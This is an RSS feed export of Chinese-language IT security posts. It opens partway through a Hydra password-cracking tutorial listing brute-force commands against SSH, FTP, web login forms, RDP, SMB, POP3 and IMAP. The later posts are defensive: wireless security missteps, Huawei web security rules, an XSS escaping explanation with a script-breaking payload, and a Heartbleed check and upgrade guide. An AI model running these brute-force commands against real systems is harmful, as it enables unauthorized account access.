  &lt;a href="http://www.ha97.com/wp-content/uploads/2012/12/hydra.jpg"&gt;   &lt;img alt="" height="463" src="http://www.ha97.com/wp-content/uploads/2012/12/hydra.jpg" title="hydra" width="885"&gt;&lt;/img&gt;&lt;/a&gt;  &lt;br /&gt;
破解成功，直接显示结果，上图画红线的地方就是破解出来的密码，也可以通过参数-o输出到文件里。如果字典够强大，结合社工，密码不用很久就出来。&lt;/p&gt;
 &lt;p&gt;1、破解ssh：  &lt;br /&gt;
  &lt;code&gt;   &lt;br /&gt;
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh   &lt;br /&gt;
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh   &lt;br /&gt;
&lt;/code&gt;  &lt;br /&gt;
2、破解ftp：  &lt;br /&gt;
  &lt;code&gt;   &lt;br /&gt;
hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV   &lt;br /&gt;
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV   &lt;br /&gt;
&lt;/code&gt;  &lt;br /&gt;
3、get方式提交，破解web登录：  &lt;br /&gt;
  &lt;code&gt;   &lt;br /&gt;
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/   &lt;br /&gt;
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php   &lt;br /&gt;
&lt;/code&gt;  &lt;br /&gt;
4、post方式提交，破解web登录：  &lt;br /&gt;
  &lt;code&gt;   &lt;br /&gt;
hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form &amp;quot;/admin/login.php:username=^USER^&amp;amp;password=^PASS^&amp;amp;submit=login:sorry password&amp;quot;   &lt;br /&gt;
&lt;/code&gt;  &lt;br /&gt;
  &lt;code&gt;   &lt;br /&gt;
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form &amp;quot;login.php:id=^USER^&amp;amp;passwd=^PASS^:&amp;lt;title&amp;gt;wrong username or password&amp;lt;/title&amp;gt;&amp;quot;   &lt;br /&gt;
&lt;/code&gt;  &lt;br /&gt;
（参数说明：-t同时线程数3，-l用户名是admin，字典pass.txt，保存为out.txt，-f 当破解了一个密码就停止， 10.36.16.18目标ip，http-post-form表示破解是采用http的post方式提交的表单密码破解,&amp;lt;title&amp;gt;中的内容是表示错误猜解的返回信息提示。）&lt;/p&gt;
 &lt;p&gt;5、破解https：  &lt;br /&gt;
  &lt;code&gt;   &lt;br /&gt;
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https   &lt;br /&gt;
&lt;/code&gt;  &lt;br /&gt;
6、破解teamspeak：  &lt;br /&gt;
  &lt;code&gt;   &lt;br /&gt;
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak   &lt;br /&gt;
&lt;/code&gt;  &lt;br /&gt;
7、破解cisco：  &lt;br /&gt;
  &lt;code&gt;   &lt;br /&gt;
hydra -P pass.txt 10.36.16.18 cisco   &lt;br /&gt;
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable   &lt;br /&gt;
&lt;/code&gt;  &lt;br /&gt;
8、破解smb：  &lt;br /&gt;
  &lt;code&gt;   &lt;br /&gt;
hydra -l administrator -P pass.txt 10.36.16.18 smb   &lt;br /&gt;
&lt;/code&gt;  &lt;br /&gt;
9、破解pop3：  &lt;br /&gt;
  &lt;code&gt;   &lt;br /&gt;
hydra -l muts -P pass.txt my.pop3.mail pop3   &lt;br /&gt;
&lt;/code&gt;  &lt;br /&gt;
10、破解rdp：  &lt;br /&gt;
  &lt;code&gt;   &lt;br /&gt;
hydra ip rdp -l administrator -P pass.txt -V   &lt;br /&gt;
&lt;/code&gt;  &lt;br /&gt;
11、破解http-proxy：  &lt;br /&gt;
  &lt;code&gt;   &lt;br /&gt;
hydra -l admin -P pass.txt http-proxy://10.36.16.18   &lt;br /&gt;
&lt;/code&gt;  &lt;br /&gt;
12、破解imap：  &lt;br /&gt;
  &lt;code&gt;   &lt;br /&gt;
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN   &lt;br /&gt;
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN   &lt;br /&gt;
&lt;/code&gt;&lt;/p&gt;
&lt;div&gt; &lt;a href="https://itindex.net/"  title="IT 资讯"&gt;&lt;img src="https://itindex.net/images/iconWarning.gif" title="IT 资讯" border="0"/&gt; &lt;/a&gt;</description>
      <category>Linux Security Tools UNIX Windows</category>
      <guid isPermaLink="true">https://itindex.net/detail/40950-linux-%E6%9A%B4%E5%8A%9B-%E5%AF%86%E7%A0%81</guid>
      <pubDate>Tue, 04 Dec 2012 19:25:46 CST</pubDate>
    </item>
    <item>
      <title>增加無線網路的安全性</title>
      <link>https://itindex.net/detail/41568-%E5%AE%89%E5%85%A8</link>
      <description>&lt;p&gt;在「  &lt;a href="http://www.howtogeek.com/132348/dont-have-a-false-sense-of-security-5-insecure-ways-to-secure-your-wi-fi/"&gt;Don’t Have a False Sense of Security: 5 Insecure Ways to Secure Your Wi-Fi&lt;/a&gt;」這篇文章裡面提到了五個「不安全的安全措施」：&lt;/p&gt; &lt;ul&gt;  &lt;li&gt;使用    &lt;a href="https://zh.wikipedia.org/wiki/%E6%9C%89%E7%B7%9A%E7%AD%89%E6%95%88%E5%8A%A0%E5%AF%86"&gt;WEP&lt;/a&gt;。&lt;/li&gt;  &lt;li&gt;隱藏    &lt;a href="https://zh.wikipedia.org/wiki/%E6%9C%8D%E5%8A%A1%E9%9B%86%E6%A0%87%E8%AF%86%E7%AC%A6"&gt;SSID&lt;/a&gt;。&lt;/li&gt;  &lt;li&gt;過濾 Mac Address。&lt;/li&gt;  &lt;li&gt;使用 Static IP。&lt;/li&gt;  &lt;li&gt;使用    &lt;a href="https://zh.wikipedia.org/wiki/WPA"&gt;WPA&lt;/a&gt; 或 WPA2 但仍使用短密碼或弱密碼。&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;無線網路不太好搞啊… 有些公司是直接限制無線網路只能連到 VPN server，利用 IPSec VPN 或是 SSLVPN 保護。  &lt;br /&gt;&lt;/p&gt; &lt;h3&gt;Related Posts:&lt;/h3&gt; &lt;ul&gt;  &lt;li&gt;   &lt;a href="http://blog.gslin.org/archives/2011/03/23/2532/%e5%9c%a8-ubuntu-10-10-x86_64-%e4%b8%8b%e9%80%a3-cisco-anyconnect/" title="&amp;#22312; Ubuntu 10.10 x86_64 &amp;#19979;&amp;#36899; Cisco AnyConnect"&gt;在 Ubuntu 10.10 x86_64 下連 Cisco AnyConnect&lt;/a&gt;&lt;/li&gt;  &lt;li&gt;   &lt;a href="http://blog.gslin.org/archives/2011/03/10/2500/%e6%89%80%e6%9c%89%e7%9a%84%e6%89%8b%e6%a9%9f%e6%87%89%e7%94%a8%e7%a8%8b%e5%bc%8f%e9%83%bd%e6%87%89%e8%a9%b2%e8%a6%81%e4%b8%8a-ssl-%e5%8f%a6%e4%b8%80%e5%80%8b%e8%aa%aa%e6%b3%95%ef%bc%8chttps/" title="&amp;#25152;&amp;#26377;&amp;#30340;&amp;#25163;&amp;#27231;&amp;#25033;&amp;#29992;&amp;#31243;&amp;#24335;&amp;#37117;&amp;#25033;&amp;#35442;&amp;#35201;&amp;#19978; SSL (&amp;#21478;&amp;#19968;&amp;#20491;&amp;#35498;&amp;#27861;&amp;#65292;HTTPS)"&gt;所有的手機應用程式都應該要上 SSL (另一個說法，HTTPS)&lt;/a&gt;&lt;/li&gt;  &lt;li&gt;   &lt;a href="http://blog.gslin.org/archives/2010/10/29/2326/%e6%9c%80%e8%bf%91%e5%be%88%e7%b4%85%e7%9a%84-firesheep/" title="&amp;#26368;&amp;#36817;&amp;#24456;&amp;#32005;&amp;#30340; Firesheep&amp;#8230;"&gt;最近很紅的 Firesheep…&lt;/a&gt;&lt;/li&gt;  &lt;li&gt;   &lt;a href="http://blog.gslin.org/archives/2012/12/29/3090/mysql-%e7%9a%84-audit-log/" title="MySQL &amp;#30340; audit log"&gt;MySQL 的 audit log&lt;/a&gt;&lt;/li&gt;  &lt;li&gt;   &lt;a href="http://blog.gslin.org/archives/2012/12/27/3087/w3-total-cache-%e5%ae%89%e5%85%a8%e6%80%a7%e5%95%8f%e9%a1%8c/" title="W3 Total Cache &amp;#23433;&amp;#20840;&amp;#24615;&amp;#21839;&amp;#38988;&amp;#8230;"&gt;W3 Total Cache 安全性問題…&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt; &lt;div&gt; &lt;a href="https://itindex.net/"  title="IT 资讯"&gt;&lt;img src="https://itindex.net/images/iconWarning.gif" title="IT 资讯" border="0"/&gt; &lt;/a&gt;</description>
      <category>Computer Hardware Murmuring Network Security</category>
      <guid isPermaLink="true">https://itindex.net/detail/41568-%E5%AE%89%E5%85%A8</guid>
      <pubDate>Thu, 03 Jan 2013 00:54:22 CST</pubDate>
    </item>
    <item>
      <title>华为内部的Web安全原则</title>
      <link>https://itindex.net/detail/49616-%E5%8D%8E%E4%B8%BA-%E5%86%85%E9%83%A8-web</link>
      <description>Web安全原则 1.认证模块必须采用防暴力破解机制，例如：验证码或者多次连续尝试登录失败后锁定帐号或IP。 说明：如采用多次连续尝试登录失败后锁定帐号或IP的方式，需支持连续登录失败锁定策略的“允许连续失败的次数”可配置，支持在锁定时间超时后自动解锁。 2.对于每一个需要授权访问的页面或servlet的请求都必须核实用户的会话标识是否合法、用户是否被授权执行这个操作，以防止URL越权。 说明：防止用户通过直接输入URL，进行URL越权，请求并执行一些页面或servlet；建议通过过滤器实现。 3. 登录过程中，往服务器端传递用户名和口令时，必须采用HTTPS安全协议（也就是带服务器端证书的SSL）。只提供本机接入、登录，做设备管理使用的场景暂时不要求。 说明：如果在客户端和服务器间传递如帐号、口令等敏感数据，必须使用带服务器端证书的SSL。由于SSL对服务端的CPU资源消耗很大，实施时必须考虑服务器的承受能力。 4. 对用户的最终认证处理过程必须放到服务器进行。 5. 用户产生的数据必须在服务端进行校验；数据在输出到客户端前必须先进行HTML编码，以防止执行恶意代码、跨站脚本攻击。对于不可信的数据，输出到客户端前必须先进行 HTML 编码。 6. 使用主流Web安全扫描工具扫描Web服务器和Web应用，不存在“高”级别的漏洞。 7. 非嵌入式产品的Web应用，应使用预编译语句PreparedStatement代替直接的语句执行Statement，以防止SQL注入。 数据库安全 外购数据库、开源数据库、华为自研数据库都应进行安全配置，保证不出现安全漏洞。 1.数据库口令禁止使用数据库厂商的缺省口令，且口令复杂度需满足“口令安全要求”。数据库若存在多个默认帐号，须将不使用的帐号禁用或删除。 2. 使用单独的操作系统帐号来运行数据库；数据库中的敏感文件（如：Oracle数据库的init.ora、listener.ora等）需要严格控制访问权限，只能被数据库进程运行帐户和DBA帐户读写；对数据库帐户授予的权限进行严格清晰的划分，所有数据库帐户只能具备执行其任务的最小权限；对于有监听器功能的数据库（如Oracle的listener.ora）需要设置监听器密码或者设置为本地操作系统验证。 3. 使用主流或华为指定的系统扫描软件进行安全扫描，不存在“高”级别的漏洞。 敏感数据保护 系统对敏感数据的存储、传输和处理需保证数据安全，并遵从适用国家和地区的法律和法规要求。 敏感数据定义：包括但不限于口令、银行账号、个人数据（单独使用该数据或者结合其他信息可以识别某个活着的自然人的数据，包括：最终用户姓名、帐号、主叫和被叫号码、通信记录、话单、通信时间、定位数据等）。 1. 口令不允许明文存储在系统中，应该加密保护。在不需要还原口令的场景，必须使用不可逆算法加密。对银行账号等敏感数据的访问要有认证、授权和加密机制。口令文件必须设置访问权限控制，普通用户不能读取或拷贝加密的内容。如果帐户文件/数据中含有口令又必须所有用户可访问，则需将帐户文件/数据与口令文件/数据分开。 注：对于业界第三方主流软硬件（如操作系统、数据库、Web容器）自身提供的口令功能，不受本条限制。 2. 在非信任网络之间进行敏感数据（包括口令，银行帐号，批量个人数据等）的传输须采用安全传输通道或者加密后传输，有标准协议规定除外。 3.禁止使用私有加密算法。 说明： 1) 对称加密算法建议使用：AES192及以上强度； 2) 密钥交换算法建议使用：DH1024； 3) 数字签名算法建议使用：DSA1024、ECDSA192； 4) 非对称算法建议使用：RSA2048、ECC192； 5) HASH（哈希）算法建议使用：SHA256及以上强度； 6) HMAC（基于哈希的消息验证码）算法建议使用：HMAC-SHA256； 4. 用于敏感数据传输加密的密钥，不能硬编码在代码中。 在敏感数据的安全传输上，优先使用业界的标准安全协议（如SSH v2/TLS1.0/SSL3.0/IPSec/SFTP/HTTPS等），并确保密钥可配置；如果是由产品自身实现安全传输过程，则优先使用Diffie-Hellman密钥交换算法，如果使用预置共享密钥等其他方法，也必须保证该密钥可配置和可替换。 5. 禁止在日志、话单等文件中记录口令、银行账号、通信内容等敏感数据； 6. 尽量避免在日志、话单中记录个人数据，如果必须记录个人数据，则所有数据必须进行结构化存储或适合于进行匿名化提取； 1）尽量避免在日志中记录个人数据，如果必须记录，在个人数据之前或之后加统一的标记，以区别于其他非个人数据。 2）尽量避免在话单中记录个人数据，如果必须记录，则话单必须进行结构化存储，字段间必须由统一的分隔符分开，每行的字段按列严格对应。 7. 有个人数据导出功能的产品发布时必须同时提供对个人数据进行过滤或匿名化处理和功能或工具； 8. 严格限制导出功能的权限，对导出功能的使用必须有日志记录。 9. 涉及个人数据的采集/处理的功能须提供安全保护机制（如认证、权限控制、日志记录等），并通过产品资料向客户公开。 10. 在正常业务流程和标准协议之外，禁止出于故障定位目的进行用户精确位置信息定位。如需处理用户精确位置数据，应有华为的明确需求，并在方案设计时，给予用户随时撤回同意的机会。 口令安全策略管理 1. 设置口令时，默认检测口令复杂度，口令至少满足如下要求： 1) 口令长度至少6个字符（特权用户至少8个字符）； 2) 口令必须包含如下至少两种字符的组合: －至少一个小写字母； －至少一个大写字母； －至少一个数字； －至少一个特殊字符：`~!@#$%^&amp;amp;*()-_=+\|[{}];:’”,&amp;lt;.&amp;gt;/?  和空格 3) 口令不能和帐号或者帐号的逆序相同； 若设置的口令不符合上述规则，必须进行警告。 2. 系统必须提供锁定用户的机制。可选择如下两种方式之一： 方式一：当重复输入错误口令次数（默认3次，次数系统可以设置）超过系统限制时，系统要锁定该用户。 [...]&lt;div&gt; &lt;a href="https://itindex.net/"  title="IT 资讯"&gt;&lt;img src="https://itindex.net/images/iconWarning.gif" title="IT 资讯" border="0"/&gt; &lt;/a&gt;</description>
      <category>DataBase Linux Security 运维经验 Web安全</category>
      <guid isPermaLink="true">https://itindex.net/detail/49616-%E5%8D%8E%E4%B8%BA-%E5%86%85%E9%83%A8-web</guid>
      <pubDate>Fri, 16 May 2014 15:06:41 CST</pubDate>
    </item>
    <item>
      <title>在 HTML 內嵌 JSON object 時要注意的事情…</title>
      <link>https://itindex.net/detail/47449-html-json-object</link>
      <description>&lt;p&gt;有時候我們會因為效能問題，在 HTML 內嵌入 JSON object，而不是再多一個 HTTP request 取得。&lt;/p&gt;
 &lt;p&gt;但「嵌入」的行為如果沒有處理好，就產生非常多 XSS attack vector 可以玩。&lt;/p&gt;
 &lt;p&gt;首先最常犯的錯誤是使用錯誤的 escape function：&lt;/p&gt;
 &lt;pre&gt;&amp;lt;!DOCTYPE HTML&amp;gt;
&amp;lt;html&amp;gt;
&amp;lt;body&amp;gt;
&amp;lt;script&amp;gt;
var a = &amp;quot;&amp;lt;?= addslashes($str) ?&amp;gt;&amp;quot;;
&amp;lt;/script&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;&lt;/pre&gt;
 &lt;p&gt;這樣可以用   &lt;code&gt;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(1);//&lt;/code&gt; 攻擊   &lt;code&gt;$str&lt;/code&gt;。因為   &lt;code&gt;   &lt;a href="http://php.net/manual/en/function.addslashes.php"&gt;addslashes&lt;/a&gt;()&lt;/code&gt; 並不會過濾到這個字串，而產生這樣的 HTML：&lt;/p&gt;
 &lt;pre&gt;&amp;lt;!DOCTYPE HTML&amp;gt;
&amp;lt;html&amp;gt;
&amp;lt;body&amp;gt;
&amp;lt;script&amp;gt;
var a = &amp;quot;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(1);//&amp;quot;;
&amp;lt;/script&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;&lt;/pre&gt;
 &lt;p&gt;而這個字串會造成 DOM parser 解讀上產生不是我們預期的行為：&lt;/p&gt;
 &lt;p&gt;  &lt;img alt="" src="http://i.imgur.com/yiA8yFl.png"&gt;&lt;/img&gt;&lt;/p&gt;
 &lt;p&gt;可以看到在字串裡面的   &lt;code&gt;&amp;lt;/script&amp;gt;&lt;/code&gt; 被拆開了。&lt;/p&gt;
 &lt;p&gt;這是因為瀏覽器會先拆解產生 DOM tree，再把   &lt;code&gt;&amp;lt;script&amp;gt;&amp;lt;/script&amp;gt;&lt;/code&gt; 內的程式碼交給 JavaScript engine 處理。所以在一開始產生 DOM tree 的時候，是看不懂 JavaScript 程式邏輯的…&lt;/p&gt;
 &lt;p&gt;正確的方法是用   &lt;code&gt;   &lt;a href="http://php.net/manual/en/function.json-encode.php"&gt;json_encode&lt;/a&gt;()&lt;/code&gt; 處理，因為   &lt;a href="http://www.php.net/"&gt;PHP&lt;/a&gt; 的   &lt;code&gt;json_encode()&lt;/code&gt; 預設會把   &lt;code&gt;/&lt;/code&gt; (slash) 變成   &lt;code&gt;\/&lt;/code&gt; (這是 JSON spec 裡合法的轉換)：&lt;/p&gt;
 &lt;pre&gt;&amp;lt;!DOCTYPE HTML&amp;gt;
&amp;lt;html&amp;gt;
&amp;lt;body&amp;gt;
&amp;lt;script&amp;gt;
var a = &amp;lt;?= json_encode($str) ?&amp;gt;;
&amp;lt;/script&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;&lt;/pre&gt;
 &lt;p&gt;這會產生出：&lt;/p&gt;
 &lt;pre&gt;&amp;lt;!DOCTYPE HTML&amp;gt;
&amp;lt;html&amp;gt;
&amp;lt;body&amp;gt;
&amp;lt;script&amp;gt;
var a = &amp;quot;&amp;lt;\/script&amp;gt;&amp;lt;script&amp;gt;alert(1);//&amp;quot;;
&amp;lt;/script&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;&lt;/pre&gt;
 &lt;p&gt;但上面這段 HTML 與 PHP code 仍然有問題，如果   &lt;code&gt;$str&lt;/code&gt; 是   &lt;code&gt;&amp;lt;!--&amp;lt;script&lt;/code&gt; 時，你會發現 DOM 又爛掉了：&lt;/p&gt;
 &lt;pre&gt;&amp;lt;!DOCTYPE HTML&amp;gt;
&amp;lt;html&amp;gt;
&amp;lt;body&amp;gt;
&amp;lt;script&amp;gt;
var a = &amp;quot;&amp;lt;!--&amp;lt;script&amp;gt;&amp;quot;;
&amp;lt;/script&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;&lt;/pre&gt;
 &lt;p&gt;  &lt;img alt="" src="http://i.imgur.com/Ofagrin.png"&gt;&lt;/img&gt;&lt;/p&gt;
 &lt;p&gt;而   &lt;a href="http://escape.alf.nu/"&gt;escape.alf.nu&lt;/a&gt; 的 Level 15 就是利用這個問題，再加上其他的漏洞而完成 XSS 攻擊。&lt;/p&gt;
 &lt;p&gt;為了這個問題去 StackOverflow 上問：「  &lt;a href="http://stackoverflow.com/questions/20942452/why-does-script-cause-a-dom-tree-break-on-the-browser"&gt;Why does &amp;lt;!–&amp;lt;script&amp;gt; cause a DOM tree break on the browser?&lt;/a&gt;」，才又發現上面這段 code 並不是合法的 HTML5 (先不管 head &amp;amp; title 的部份，補上後仍然不是合法的 HTML5)。&lt;/p&gt;
 &lt;p&gt;原因在於 DOM parser 對   &lt;code&gt;&amp;lt;script&amp;gt;&amp;lt;/script&amp;gt;&lt;/code&gt; 的特殊處理：「  &lt;a href="http://www.w3.org/TR/html5/scripting-1.html#restrictions-for-contents-of-script-elements"&gt;4.3.1.2 Restrictions for contents of script elements&lt;/a&gt;」。(話說這段 ABNF 差點讓我翻桌…)&lt;/p&gt;
 &lt;p&gt;解法是在   &lt;code&gt;&amp;lt;script&amp;gt;&amp;lt;/script&amp;gt;&lt;/code&gt; 的開頭與結尾加上 HTML 註解：(這剛好是   &lt;a href="http://www.w3.org/TR/REC-html40/"&gt;HTML 4.01&lt;/a&gt; 建議的方法)&lt;/p&gt;
 &lt;pre&gt;&amp;lt;!DOCTYPE HTML&amp;gt;
&amp;lt;html&amp;gt;
&amp;lt;body&amp;gt;
&amp;lt;script&amp;gt;
&amp;lt;!--
var a = &amp;quot;&amp;lt;!--&amp;lt;script&amp;gt;&amp;quot;;
--&amp;gt;
&amp;lt;/script&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;&lt;/pre&gt;
 &lt;p&gt;  &lt;img alt="" src="http://i.imgur.com/H4YzEmY.png"&gt;&lt;/img&gt;&lt;/p&gt;
 &lt;p&gt;那段 ABNF 的目的是希望可以盡可能往後找到   &lt;code&gt;--&amp;gt;&lt;/code&gt; 與   &lt;code&gt;&amp;lt;/script&amp;gt;&lt;/code&gt; 結尾的地方。&lt;/p&gt;
 &lt;p&gt;當然你也可以用   &lt;code&gt;json_encode()&lt;/code&gt; 的   &lt;code&gt;JSON_HEX_TAG&lt;/code&gt; 把   &lt;code&gt;&amp;lt;&lt;/code&gt; 與   &lt;code&gt;&amp;gt;&lt;/code&gt; 硬轉成   &lt;code&gt;\u003c&lt;/code&gt; 與   &lt;code&gt;\u003e&lt;/code&gt; 避開這個問題，但這使得呼叫   &lt;code&gt;json_encode()&lt;/code&gt; 時要多一個參數 (而非預設參數)，用起來比較卡…&lt;/p&gt;
 &lt;p&gt;這個問題會變得這麼討厭，是因為 DOM parser 與 JavaScript 語法之間有各自的處理方式，然後又有些 pattern 是之前的 spec 遺留下來的包袱 (像是 HTML 4.01 在「  &lt;a href="http://www.w3.org/TR/REC-html40/interact/scripts.html#h-18.3.2"&gt;18.3.2 Hiding script data from user agents&lt;/a&gt;」裡有提到用   &lt;code&gt;&amp;lt;!--&lt;/code&gt; 與   &lt;code&gt;--&amp;gt;&lt;/code&gt; 包裝   &lt;code&gt;&amp;lt;script&amp;gt;&amp;lt;/script&amp;gt;&lt;/code&gt;)，變成在設計 HTML5 時都要考慮進去相容…&lt;/p&gt;
 &lt;p&gt;之前會習慣用   &lt;code&gt;&amp;lt;!--&lt;/code&gt; 與   &lt;code&gt;//--&amp;gt;&lt;/code&gt; 包裝   &lt;code&gt;&amp;lt;script&amp;gt;&amp;lt;/script&amp;gt;&lt;/code&gt; 倒不是這個原因，而是因為不這樣做的話，  &lt;a href="http://jquery.com/"&gt;jQuery&lt;/a&gt; 在 IE 使用   &lt;code&gt;   &lt;a href="http://api.jquery.com/html/"&gt;html&lt;/a&gt;()&lt;/code&gt; 時遇到有   &lt;code&gt;&amp;lt;script&amp;gt;&amp;lt;/script&amp;gt;&lt;/code&gt; 的字串會爛掉，所以後來寫的時候變成習慣了…&lt;/p&gt;
 &lt;p&gt;反而因為這個習慣而避開了這個問題…&lt;/p&gt;
 &lt;p&gt;超難搞啊…  &lt;br /&gt;
&lt;/p&gt; &lt;h3&gt;Related Posts:&lt;/h3&gt;
 &lt;ul&gt;
  &lt;li&gt;   &lt;a href="http://blog.gslin.org/archives/2013/12/27/4012/filter-input-escape-output/" title="Filter Input &amp; Escape Output&amp;#8230;"&gt;Filter Input &amp;amp; Escape Output…&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;   &lt;a href="http://blog.gslin.org/archives/2013/08/16/3434/%e6%96%b0%e7%9a%84-https-%e6%94%bb%e6%93%8a%ef%bc%9abreach-compression-attack/" title="&amp;#26032;&amp;#30340; HTTPS &amp;#25915;&amp;#25802;&amp;#65306;BREACH Compression Attack"&gt;新的 HTTPS 攻擊：BREACH Compression Attack&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;   &lt;a href="http://blog.gslin.org/archives/2013/02/05/3174/ssltls-%e7%9a%84%e5%95%8f%e9%a1%8c/" title="SSL/TLS &amp;#30340;&amp;#21839;&amp;#38988;&amp;#8230;"&gt;SSL/TLS 的問題…&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;   &lt;a href="http://blog.gslin.org/archives/2013/01/10/3122/iframe-%e7%9a%84-sandbox-%e5%8a%9f%e8%83%bd/" title="iframe &amp;#30340; sandbox &amp;#21151;&amp;#33021;&amp;#8230;"&gt;iframe 的 sandbox 功能…&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;   &lt;a href="http://blog.gslin.org/archives/2012/11/18/3031/%e8%99%9b%e6%93%ac%e6%a9%9f%e5%85%a7%e7%9a%84-side-channel-attack/" title="&amp;#34395;&amp;#25836;&amp;#27231;&amp;#20839;&amp;#30340; Side-channel attack&amp;#8230;"&gt;虛擬機內的 Side-channel attack…&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt; &lt;a href="https://itindex.net/"  title="IT 资讯"&gt;&lt;img src="https://itindex.net/images/iconWarning.gif" title="IT 资讯" border="0"/&gt; &lt;/a&gt;</description>
      <category>Computer Murmuring Network Programming Security</category>
      <guid isPermaLink="true">https://itindex.net/detail/47449-html-json-object</guid>
      <pubDate>Mon, 06 Jan 2014 16:23:19 CST</pubDate>
    </item>
    <item>
      <title>OpenSSL CVE-2014-0160 Heartbleed 安全漏洞檢測</title>
      <link>https://itindex.net/detail/49003-openssl-cve-heartbleed</link>
      <description>&lt;div&gt;


&lt;/div&gt;


 &lt;p&gt;OpenSSL 爆發出嚴重的安全性漏洞, 請趕快檢測 + 升級.&lt;/p&gt;
 &lt;p&gt;&lt;/p&gt;
 &lt;h2&gt;OpenSSL CVE-2014-0160 Heartbleed 安全漏洞檢測&lt;/h2&gt;
 &lt;p&gt;關於此次事件, 此篇文章:   &lt;a href="http://devco.re/blog/2014/04/09/openssl-heartbleed-CVE-2014-0160/" target="_blank" title="OpenSSL CVE-2014-0160 Heartbleed &amp;#22196;&amp;#37325;&amp;#28431;&amp;#27934; | DEVCORE &amp;#25140;&amp;#22827;&amp;#23495;&amp;#29246;"&gt;OpenSSL CVE-2014-0160 Heartbleed 嚴重漏洞&lt;/a&gt;, 寫的非常清楚, 在此就不詳述, 再此摘錄部份說明: (感謝 Allen Own)&lt;/p&gt;
 &lt;blockquote&gt;  &lt;p&gt;這個漏洞能讓攻擊者從伺服器記憶體中讀取 64 KB 的資料，利用傳送 heartbeat 的封包給伺服器，在封包中控制變數導致 memcpy 函數複製錯誤的記憶體資料，因而擷取記憶體中可能存在的機敏資料。記憶體中最嚴重可能包含 ssl private key、session cookie、使用者密碼等，因此可能因為這樣的漏洞導致伺服器遭到入侵或取得使用者帳號。&lt;/p&gt;&lt;/blockquote&gt;
 &lt;p&gt;註: 此篇文章非常清楚說明問題、應對措施, 該如何做等等, 在此就不詳述, 只紀錄幾個要做的事情.&lt;/p&gt;
 &lt;h3&gt;Debina / Ubuntu Linux 需要做的事情&lt;/h3&gt;
 &lt;ol&gt;
  &lt;li&gt;   &lt;strong&gt;dpkg -l | grep openssl&lt;/strong&gt; # 確認 OpenSSL 版本是否是 openssl 1.0.1e-2+deb7u4 (Debian Wheezy) / openssl 1.0.1-4ubuntu5.11 (Ubuntu 12.04)&lt;/li&gt;
  &lt;li&gt;使用下述檢測工具測試
   &lt;ol&gt;
    &lt;li&gt;Heartbleed test:      &lt;a href="http://filippo.io/Heartbleed/" target="_blank" title="Test your server for Heartbleed (CVE-2014-0160)"&gt;Test your server for Heartbleed (CVE-2014-0160)&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;自我測試工具:      &lt;a href="http://s3.jspenguin.org/ssltest.py" target="_blank" title="ssltest.py"&gt;http://s3.jspenguin.org/ssltest.py&lt;/a&gt; 或      &lt;a href="http://blogs.longwin.com.tw/wordpress/ssltest-cve-2014-0160.py" target="_blank" title="ssltest.py"&gt;備份&lt;/a&gt;, ex: python ssltest.py ifttt.com&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
  &lt;li&gt;檢測是否有問題:
   &lt;ul&gt;
    &lt;li&gt;有問題, 請到上述文章去看有哪些事情要作.&lt;/li&gt;
    &lt;li&gt;沒有問題, 請執行套件升級:
     &lt;ol&gt;
      &lt;li&gt;       &lt;strong&gt;apt-get update&lt;/strong&gt;&lt;/li&gt;
      &lt;li&gt;apt-get upgrade # 注意 openssl、libssl.&lt;/li&gt;
      &lt;li&gt;更新後的版本是:
       &lt;ul&gt;
        &lt;li&gt;Debian Wheezy: openssl 1.0.1e-2+deb7u6&lt;/li&gt;
        &lt;li&gt;Debian Jessie: openssl 1.0.1g-1&lt;/li&gt;
        &lt;li&gt;Ubuntu 12.04: openssl 1.0.1-4ubuntu5.12&lt;/li&gt;
        &lt;li&gt;Ubuntu 13.10: openssl 1.0.1e-3ubuntu1.2&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
  &lt;li&gt;注意:    &lt;strong&gt;OpenSSL 1.0.1 ~ 1.0.1f 和 1.0.2-beta 使用這些版本建出來的 SSL Key 會需要重新產生建立&lt;/strong&gt;&lt;/li&gt;
&lt;/ol&gt;
 &lt;h4&gt;相關網頁&lt;/h4&gt;
 &lt;ul&gt;
  &lt;li&gt;   &lt;a href="http://blog.existentialize.com/diagnosis-of-the-openssl-heartbleed-bug.html" target="_blank" title="existential type crisis : Diagnosis of the OpenSSL Heartbleed Bug"&gt;existential type crisis : Diagnosis of the OpenSSL Heartbleed Bug&lt;/a&gt; - 有詳細的原因、說明&lt;/li&gt;
